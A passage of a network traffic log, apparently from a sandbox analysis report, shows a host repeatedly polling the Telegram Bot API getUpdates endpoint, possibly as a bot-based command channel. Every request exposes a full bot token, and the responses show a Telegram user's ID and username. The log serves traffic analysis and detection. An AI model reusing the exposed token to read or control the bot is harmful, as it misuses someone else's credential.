35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 Data Ascii: {"ok":true,"result":[{"update_id":140376750,"my_chat_member":{"chat":{"id":6893446818,"first_name":"\u560e\u560e","last_name":"\u560e\u560e","username":"xingcai943","type":"private"},"from":{"id":6893446818,"is_bot":false,"first_name":"\u560e\u560e","las

Session ID	Source IP	Source Port	Destination IP	Destination Port
48	192.168.2.5	56249	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:51:37 UTC	112	OUT	GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-09-02 14:51:37 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 14:51:37 GMT Content-Type: application/json Content-Length: 636 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-02 14:51:37 UTC	636	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 31 34 30 33 37 36 37 35 30 2c 0a 22 6d 79 5f 63 68 61 74 5f 6d 65 6d 62 65 72 22 3a 7b 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 78 69 6e 67 63 61 69 39 34 33 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 Data Ascii: {"ok":true,"result":[{"update_id":140376750,"my_chat_member":{"chat":{"id":6893446818,"first_name":"\u560e\u560e","last_name":"\u560e\u560e","username":"xingcai943","type":"private"},"from":{"id":6893446818,"is_bot":false,"first_name":"\u560e\u560e","las

Session ID	Source IP	Source Port	Destination IP	Destination Port
49	192.168.2.5	56251	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:51:39 UTC	112	OUT	GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-09-02 14:51:39 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 14:51:39 GMT Content-Type: application/json Content-Length: 636 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-02 14:51:39 UTC	636	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 31 34 30 33 37 36 37 35 30 2c 0a 22 6d 79 5f 63 68 61 74 5f 6d 65 6d 62 65 72 22 3a 7b 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 78 69 6e 67 63 61 69 39 34 33 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 Data Ascii: {"ok":true,"result":[{"update_id":140376750,"my_chat_member":{"chat":{"id":6893446818,"first_name":"\u560e\u560e","last_name":"\u560e\u560e","username":"xingcai943","type":"private"},"from":{"id":6893446818,"is_bot":false,"first_name":"\u560e\u560e","las

Session ID	Source IP	Source Port	Destination IP	Destination Port
50	192.168.2.5	56252	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:51:39 UTC	112	OUT	GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-09-02 14:51:39 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 14:51:39 GMT Content-Type: application/json Content-Length: 636 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-02 14:51:39 UTC	636	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 31 34 30 33 37 36 37 35 30 2c 0a 22 6d 79 5f 63 68 61 74 5f 6d 65 6d 62 65 72 22 3a 7b 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 78 69 6e 67 63 61 69 39 34 33 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 Data Ascii: {"ok":true,"result":[{"update_id":140376750,"my_chat_member":{"chat":{"id":6893446818,"first_name":"\u560e\u560e","last_name":"\u560e\u560e","username":"xingcai943","type":"private"},"from":{"id":6893446818,"is_bot":false,"first_name":"\u560e\u560e","las

Session ID	Source IP	Source Port	Destination IP	Destination Port
51	192.168.2.5	56253	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:51:40 UTC	112	OUT	GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-09-02 14:51:41 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 14:51:41 GMT Content-Type: application/json Content-Length: 636 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-02 14:51:41 UTC	636	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 31 34 30 33 37 36 37 35 30 2c 0a 22 6d 79 5f 63 68 61 74 5f 6d 65 6d 62 65 72 22 3a 7b 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 78 69 6e 67 63 61 69 39 34 33 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 Data Ascii: {"ok":true,"result":[{"update_id":140376750,"my_chat_member":{"chat":{"id":6893446818,"first_name":"\u560e\u560e","last_name":"\u560e\u560e","username":"xingcai943","type":"private"},"from":{"id":6893446818,"is_bot":false,"first_name":"\u560e\u560e","las

Session ID	Source IP	Source Port	Destination IP	Destination Port
52	192.168.2.5	56254	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:51:40 UTC	112	OUT	GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-09-02 14:51:41 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 14:51:41 GMT Content-Type: application/json Content-Length: 636 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-02 14:51:41 UTC	636	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 31 34 30 33 37 36 37 35 30 2c 0a 22 6d 79 5f 63 68 61 74 5f 6d 65 6d 62 65 72 22 3a 7b 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 78 69 6e 67 63 61 69 39 34 33 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 Data Ascii: {"ok":true,"result":[{"update_id":140376750,"my_chat_member":{"chat":{"id":6893446818,"first_name":"\u560e\u560e","last_name":"\u560e\u560e","username":"xingcai943","type":"private"},"from":{"id":6893446818,"is_bot":false,"first_name":"\u560e\u560e","las

Session ID	Source IP	Source Port	Destination IP	Destination Port
53	192.168.2.5	56255	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:51:42 UTC	112	OUT	GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-09-02 14:51:43 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 14:51:42 GMT Content-Type: application/json Content-Length: 636 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-02 14:51:43 UTC	636	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 31 34 30 33 37 36 37 35 30 2c 0a 22 6d 79 5f 63 68 61 74 5f 6d 65 6d 62 65 72 22 3a 7b 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 78 69 6e 67 63 61 69 39 34 33 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 Data Ascii: {"ok":true,"result":[{"update_id":140376750,"my_chat_member":{"chat":{"id":6893446818,"first_name":"\u560e\u560e","last_name":"\u560e\u560e","username":"xingcai943","type":"private"},"from":{"id":6893446818,"is_bot":false,"first_name":"\u560e\u560e","las

Session ID	Source IP	Source Port	Destination IP	Destination Port
54	192.168.2.5	56256	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:51:42 UTC	112	OUT	GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-09-02 14:51:43 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 14:51:42 GMT Content-Type: application/json Content-Length: 636 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-02 14:51:43 UTC	636	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 31 34 30 33 37 36 37 35 30 2c 0a 22 6d 79 5f 63 68 61 74 5f 6d 65 6d 62 65 72 22 3a 7b 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 78 69 6e 67 63 61 69 39 34 33 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 Data Ascii: {"ok":true,"result":[{"update_id":140376750,"my_chat_member":{"chat":{"id":6893446818,"first_name":"\u560e\u560e","last_name":"\u560e\u560e","username":"xingcai943","type":"private"},"from":{"id":6893446818,"is_bot":false,"first_name":"\u560e\u560e","las

Session ID	Source IP	Source Port	Destination IP	Destination Port
55	192.168.2.5	56257	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:51:44 UTC	112	OUT	GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-09-02 14:51:45 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 14:51:44 GMT Content-Type: application/json Content-Length: 636 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-02 14:51:45 UTC	636	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 31 34 30 33 37 36 37 35 30 2c 0a 22 6d 79 5f 63 68 61 74 5f 6d 65 6d 62 65 72 22 3a 7b 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 78 69 6e 67 63 61 69 39 34 33 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 Data Ascii: {"ok":true,"result":[{"update_id":140376750,"my_chat_member":{"chat":{"id":6893446818,"first_name":"\u560e\u560e","last_name":"\u560e\u560e","username":"xingcai943","type":"private"},"from":{"id":6893446818,"is_bot":false,"first_name":"\u560e\u560e","las

Session ID	Source IP	Source Port	Destination IP	Destination Port
56	192.168.2.5	56258	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:51:44 UTC	112	OUT	GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-09-02 14:51:45 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 14:51:44 GMT Content-Type: application/json Content-Length: 636 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-02 14:51:45 UTC	636	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 31 34 30 33 37 36 37 35 30 2c 0a 22 6d 79 5f 63 68 61 74 5f 6d 65 6d 62 65 72 22 3a 7b 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 78 69 6e 67 63 61 69 39 34 33 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 Data Ascii: {"ok":true,"result":[{"update_id":140376750,"my_chat_member":{"chat":{"id":6893446818,"first_name":"\u560e\u560e","last_name":"\u560e\u560e","username":"xingcai943","type":"private"},"from":{"id":6893446818,"is_bot":false,"first_name":"\u560e\u560e","las

Session ID	Source IP	Source Port	Destination IP	Destination Port
57	192.168.2.5	56259	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:51:46 UTC	112	OUT	GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-09-02 14:51:47 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 14:51:46 GMT Content-Type: application/json Content-Length: 636 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-02 14:51:47 UTC	636	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 31 34 30 33 37 36 37 35 30 2c 0a 22 6d 79 5f 63 68 61 74 5f 6d 65 6d 62 65 72 22 3a 7b 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 78 69 6e 67 63 61 69 39 34 33 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 Data Ascii: {"ok":true,"result":[{"update_id":140376750,"my_chat_member":{"chat":{"id":6893446818,"first_name":"\u560e\u560e","last_name":"\u560e\u560e","username":"xingcai943","type":"private"},"from":{"id":6893446818,"is_bot":false,"first_name":"\u560e\u560e","las

Session ID	Source IP	Source Port	Destination IP	Destination Port
58	192.168.2.5	56260	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:51:46 UTC	112	OUT	GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-09-02 14:51:47 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 14:51:47 GMT Content-Type: application/json Content-Length: 636 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-02 14:51:47 UTC	636	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 31 34 30 33 37 36 37 35 30 2c 0a 22 6d 79 5f 63 68 61 74 5f 6d 65 6d 62 65 72 22 3a 7b 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 78 69 6e 67 63 61 69 39 34 33 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 Data Ascii: {"ok":true,"result":[{"update_id":140376750,"my_chat_member":{"chat":{"id":6893446818,"first_name":"\u560e\u560e","last_name":"\u560e\u560e","username":"xingcai943","type":"private"},"from":{"id":6893446818,"is_bot":false,"first_name":"\u560e\u560e","las

Session ID	Source IP	Source Port	Destination IP	Destination Port
59	192.168.2.5	56261	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:51:48 UTC	112	OUT	GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-09-02 14:51:48 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 14:51:48 GMT Content-Type: application/json Content-Length: 636 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-02 14:51:48 UTC	636	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 31 34 30 33 37 36 37 35 30 2c 0a 22 6d 79 5f 63 68 61 74 5f 6d 65 6d 62 65 72 22 3a 7b 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 78 69 6e 67 63 61 69 39 34 33 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 Data Ascii: {"ok":true,"result":[{"update_id":140376750,"my_chat_member":{"chat":{"id":6893446818,"first_name":"\u560e\u560e","last_name":"\u560e\u560e","username":"xingcai943","type":"private"},"from":{"id":6893446818,"is_bot":false,"first_name":"\u560e\u560e","las

Session ID	Source IP	Source Port	Destination IP	Destination Port
60	192.168.2.5	56262	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:51:48 UTC	112	OUT	GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-09-02 14:51:48 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 14:51:48 GMT Content-Type: application/json Content-Length: 636 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-02 14:51:48 UTC	636	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 31 34 30 33 37 36 37 35 30 2c 0a 22 6d 79 5f 63 68 61 74 5f 6d 65 6d 62 65 72 22 3a 7b 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 78 69 6e 67 63 61 69 39 34 33 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 Data Ascii: {"ok":true,"result":[{"update_id":140376750,"my_chat_member":{"chat":{"id":6893446818,"first_name":"\u560e\u560e","last_name":"\u560e\u560e","username":"xingcai943","type":"private"},"from":{"id":6893446818,"is_bot":false,"first_name":"\u560e\u560e","las

Session ID	Source IP	Source Port	Destination IP	Destination Port
61	192.168.2.5	56265	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:51:50 UTC	112	OUT	GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-09-02 14:51:51 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 14:51:51 GMT Content-Type: application/json Content-Length: 636 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
